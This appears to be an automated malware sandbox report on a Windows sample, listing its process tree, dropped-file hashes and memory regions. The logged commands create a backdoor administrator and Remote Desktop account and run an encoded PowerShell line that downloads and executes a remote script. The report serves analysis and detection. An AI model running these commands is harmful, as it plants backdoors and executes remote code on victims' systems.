[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      command line: net.exe user wgautilacc Ghar4f5 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user wgautilacc DI6t4nmh /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      command line: net.exe user wgautilacc DI6t4nmh /add
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user wgautilacc DI6t4nmh /add
[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user wgautilacc DI6t4nmh
  [2] C:\Windows\system32\net.exe
      command line: net.exe user wgautilacc DI6t4nmh
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user wgautilacc DI6t4nmh
[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      command line: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      command line: wmic CPU get NAME
[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C net user wgautilacc 1234
  [2] C:\Windows\system32\net.exe
      command line: net user wgautilacc 1234
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user wgautilacc 1234
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Armario.vsd
  MD5     b166004bb483196fdfed1ff529fbab5d
  SHA1    8791d9f6c24f2c0ceb1890a122ba963cbd000bb4
  SHA256  f226f152d6028727a02b0e53270ffe84de977820cbf8e7ef88ed92e84d93dd6e
  SHA512  1b70385424124cc43970236dee9ca2b820ea67aa14241e76b131def1eeea5e86f727e7aec32685a7e84e2d292c8641ccca40f86ac61e32f26ace25018f8532fd
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Che.vsd
  MD5     22cf0f40a76342274fc11807e9bf11f8
  SHA1    4ae2b8e887b09d6bdb1ea8b2a69787d86c5f6c3a
  SHA256  22cae1b1a1b5e82652921b6860e3cf9e3244b41faee4abfae287d84867e2cb2a
  SHA512  0d8079c4f32688e9f72473982d415d848995d797b6b144f092011073c1fd63853a078a8f470f0da9083bd4900718c05ece672e96cc67f33ae745d2982a22a628
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\D
  MD5     b166004bb483196fdfed1ff529fbab5d
  SHA1    8791d9f6c24f2c0ceb1890a122ba963cbd000bb4
  SHA256  f226f152d6028727a02b0e53270ffe84de977820cbf8e7ef88ed92e84d93dd6e
  SHA512  1b70385424124cc43970236dee9ca2b820ea67aa14241e76b131def1eeea5e86f727e7aec32685a7e84e2d292c8641ccca40f86ac61e32f26ace25018f8532fd
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Poi.vsd
  MD5     6a0c13b3b8039e95c808cfb008f26b4b
  SHA1    66e719e05c0bdb69a9f95dfdc1a54d626c9eb667
  SHA256  158d9b907399f5b5da7decd462a704cd44c03f3bad934271ba1e2164b1230377
  SHA512  44576ecc0673958d46efd1417042e6141e6ebab1516414736b5d171153a9a068e0e0e52c942fba09b886ff5e11a88f53f434ecf42b9e6c33c192c6efb56fc9fc
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Veduto.vsd
  MD5     3c2f37a9838a0b5aa9fb0986ecba0d11
  SHA1    b06377a345b2a7527063b3d0405ee50bbf7c1433
  SHA256  b0b36c48206e2662c9aaca05b8e03f3378cf1052c383fda02a793d1277a71f93
  SHA512  cd0189a87ff971e392d3f7811c77fc8ec68424056060bd72d4ca924723955565ab07e377a142c8a5265cbb80274de353ca3e5d27194d272393794105306678ce
- C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com
  MD5     f83ab141e29899ceb5308dabde894a0e
  SHA1    6ea46bb7102125fa5d39b77547dab28ec346e9f9
  SHA256  ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
  SHA512  d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comMD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comMD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\RESAD38.tmpMD5
f4f91cafe2b46c219327deaa4b5873d1
SHA1db21216dc794bcaf72beeb0e3567d70b5c6e8c01
SHA256c830c58b82e39d0dc261a4258530cbdbd543f2da8106288f315f08323c0c0c5d
SHA51266044f29384e8f57ca9b39056e0bea0cde2c58379dd8dfeeb14a458be766a745afb1be38c47ed9d12a7882cc18b6ea406ebef1306653382218926e23dd21ea25
-
C:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.dllMD5
c64073d64020cd05932222f7fdcbd515
SHA145a9a1fbcc082c745b5f0af85e20d99dd2ea4f62
SHA256c64f26fad939e3b59c19827fe3ad3d1b04ac54ccdf0f2b1b419033671984d18c
SHA51216c74f673698dbcc21f7ce471168ce33767449b10b5316664c63ee2caf60d9c495c2e6619cb0ea7a8e4e33d08893b9a580d46a23ce895f73d154130db6638062
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
920b50692e0e9c4e32c79f89fafce0c4
SHA14cb71db2bb05daa4e84c649b6c58cbfd20c8e484
SHA25685fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
SHA512966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\CSC3358E928C6584838BD4D118D3AA38383.TMPMD5
bcbe07eee0efc7deed201f89b9792453
SHA1872dee314db6d5f2fcacb5eff113c01a65ae1ad7
SHA2565350d5afd9489daf37802fa369a301c392d9bbe0e37777fead2c524426da4703
SHA51233085749dd9be3e90ed030425fe2b188fe0466cc55d2cd306d3d5f20b5074b25bc4ad88bbcc831b4efc8db0eb0c0de224876f22fd99cc85069e44a822a6c82a6
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.cmdlineMD5
a022555ed6b40311c3a3dff84c00ba55
SHA192279ed1eaf6a178a7e40f35e478cf889b2333e6
SHA2560232efa937e1fed4224678d024457378bfcdc3363c8b40b5771501af6366b330
SHA5122bdadcc6ff58d1bc124fad41c4d36971b675f674ffe0ac0fb9e958a992873b4d14897b84c2e44a4cd157b8ef24d2d3b3a9e8b8aa469a29b265c1d5180afa4f1c
-
\Windows\Branding\mediasrv.pngMD5
96a6c5d47b0670a98699b2b424e2e65e
SHA157a31831c368efd82801f94a1b72c7230f4288be
SHA256bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
SHA512b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
-
\Windows\Branding\mediasvc.pngMD5
a3da4eee0a06c45c5bec80fd959ad539
SHA1a8d2d3691af2e1af85ed8947347d0981017b7a32
SHA2568a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
SHA5128d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
memory/60-117-0x0000000000000000-mapping.dmp
-
memory/196-264-0x0000000000000000-mapping.dmp
-
memory/492-251-0x0000000000000000-mapping.dmp
-
memory/776-233-0x0000000000000000-mapping.dmp
-
memory/816-128-0x000001FBCCB10000-0x000001FBCD166000-memory.dmp
Filesize 6.3MB
-
memory/816-136-0x000001FBF4CB6000-0x000001FBF4CB7000-memory.dmp
Filesize 4KB
-
memory/816-135-0x000001FBF4CB5000-0x000001FBF4CB6000-memory.dmp
Filesize 4KB
-
memory/816-134-0x000001FBF4CB3000-0x000001FBF4CB5000-memory.dmp
Filesize 8KB
-
memory/816-133-0x000001FBF4CB0000-0x000001FBF4CB2000-memory.dmp
Filesize 8KB
-
memory/816-131-0x000001FBCCB10000-0x000001FBCD166000-memory.dmp
Filesize 6.3MB
-
memory/816-130-0x000001FBF50F0000-0x000001FBF5511000-memory.dmp
Filesize 4.1MB
-
memory/1276-144-0x00000216C9FF0000-0x00000216C9FF1000-memory.dmp
Filesize 4KB
-
memory/1276-174-0x00000216CB520000-0x00000216CB521000-memory.dmp
Filesize 4KB
-
memory/1276-158-0x00000216CA066000-0x00000216CA068000-memory.dmp
Filesize 8KB
-
memory/1276-150-0x00000216CAD40000-0x00000216CAD41000-memory.dmp
Filesize 4KB
-
memory/1276-175-0x00000216CA068000-0x00000216CA069000-memory.dmp
Filesize 4KB
-
memory/1276-149-0x00000216CA063000-0x00000216CA065000-memory.dmp
Filesize 8KB
-
memory/1276-147-0x00000216CA060000-0x00000216CA062000-memory.dmp
Filesize 8KB
-
memory/1276-173-0x00000216CB190000-0x00000216CB191000-memory.dmp
Filesize 4KB
-
memory/1276-166-0x00000216CA040000-0x00000216CA041000-memory.dmp
Filesize 4KB
-
memory/1276-137-0x0000000000000000-mapping.dmp
-
memory/1340-229-0x0000000000000000-mapping.dmp
-
memory/2096-253-0x0000000000000000-mapping.dmp
-
memory/2300-224-0x0000027E5EC46000-0x0000027E5EC48000-memory.dmp
Filesize 8KB
-
memory/2300-220-0x0000000000000000-mapping.dmp
-
memory/2300-225-0x0000027E5EC48000-0x0000027E5EC4A000-memory.dmp
Filesize 8KB
-
memory/2300-223-0x0000027E5EC43000-0x0000027E5EC45000-memory.dmp
Filesize 8KB
-
memory/2300-222-0x0000027E5EC40000-0x0000027E5EC42000-memory.dmp
Filesize 8KB
-
memory/2616-159-0x0000000000000000-mapping.dmp
-
memory/2680-162-0x0000000000000000-mapping.dmp
-
memory/2724-254-0x0000000000000000-mapping.dmp
-
memory/2824-255-0x0000000000000000-mapping.dmp
-
memory/3032-235-0x0000000000000000-mapping.dmp
-
memory/3036-116-0x0000000000000000-mapping.dmp
-
memory/3236-236-0x0000000000000000-mapping.dmp
-
memory/3364-249-0x0000000000000000-mapping.dmp
-
memory/3440-230-0x0000000000000000-mapping.dmp
-
memory/3564-231-0x0000000000000000-mapping.dmp
-
memory/3596-232-0x0000000000000000-mapping.dmp
-
memory/3612-248-0x0000000000000000-mapping.dmp
-
memory/3676-114-0x0000000000000000-mapping.dmp
-
memory/3684-245-0x0000000000000000-mapping.dmp
-
memory/3828-246-0x0000000000000000-mapping.dmp
-
memory/3848-256-0x0000000000000000-mapping.dmp
-
memory/3848-260-0x0000020202F78000-0x0000020202F79000-memory.dmp
Filesize 4KB
-
memory/3848-259-0x0000020202F76000-0x0000020202F78000-memory.dmp
Filesize 8KB
-
memory/3848-258-0x0000020202F73000-0x0000020202F75000-memory.dmp
Filesize 8KB
-
memory/3848-257-0x0000020202F70000-0x0000020202F72000-memory.dmp
Filesize 8KB
-
memory/3888-127-0x00000264709C0000-0x00000264709C1000-memory.dmp
Filesize 4KB
-
memory/3888-252-0x0000000000000000-mapping.dmp
-
memory/3888-124-0x0000000000000000-mapping.dmp
-
memory/3952-226-0x0000000000000000-mapping.dmp
-
memory/4016-261-0x0000000000000000-mapping.dmp
-
memory/4024-182-0x0000000000000000-mapping.dmp
-
memory/4024-217-0x000002710A738000-0x000002710A73A000-memory.dmp
Filesize 8KB
-
memory/4024-196-0x000002710A733000-0x000002710A735000-memory.dmp
Filesize 8KB
-
memory/4024-195-0x000002710A730000-0x000002710A732000-memory.dmp
Filesize 8KB
-
memory/4024-199-0x000002710A736000-0x000002710A738000-memory.dmp
Filesize 8KB
-
memory/4168-243-0x0000000000000000-mapping.dmp
-
memory/4188-244-0x0000000000000000-mapping.dmp
-
memory/4220-234-0x0000000000000000-mapping.dmp
-
memory/4256-120-0x0000000000000000-mapping.dmp
-
memory/4256-237-0x0000000000000000-mapping.dmp
-
memory/4276-122-0x0000000000000000-mapping.dmp
-
memory/4324-263-0x0000000000000000-mapping.dmp
-
memory/4384-262-0x0000000000000000-mapping.dmp
-
memory/4604-219-0x00000287380A3000-0x00000287380A5000-memory.dmp
Filesize 8KB
-
memory/4604-216-0x0000000000000000-mapping.dmp
-
memory/4604-218-0x00000287380A0000-0x00000287380A2000-memory.dmp
Filesize 8KB
-
memory/4604-221-0x00000287380A6000-0x00000287380A8000-memory.dmp
Filesize 8KB
-
memory/4672-242-0x0000000000000000-mapping.dmp
-
memory/4724-241-0x0000000000000000-mapping.dmp
-
memory/4736-250-0x0000000000000000-mapping.dmp
-
memory/4892-227-0x0000000000000000-mapping.dmp
-
memory/4956-247-0x0000000000000000-mapping.dmp
-
memory/4980-228-0x0000000000000000-mapping.dmp
-
memory/5012-238-0x0000000000000000-mapping.dmp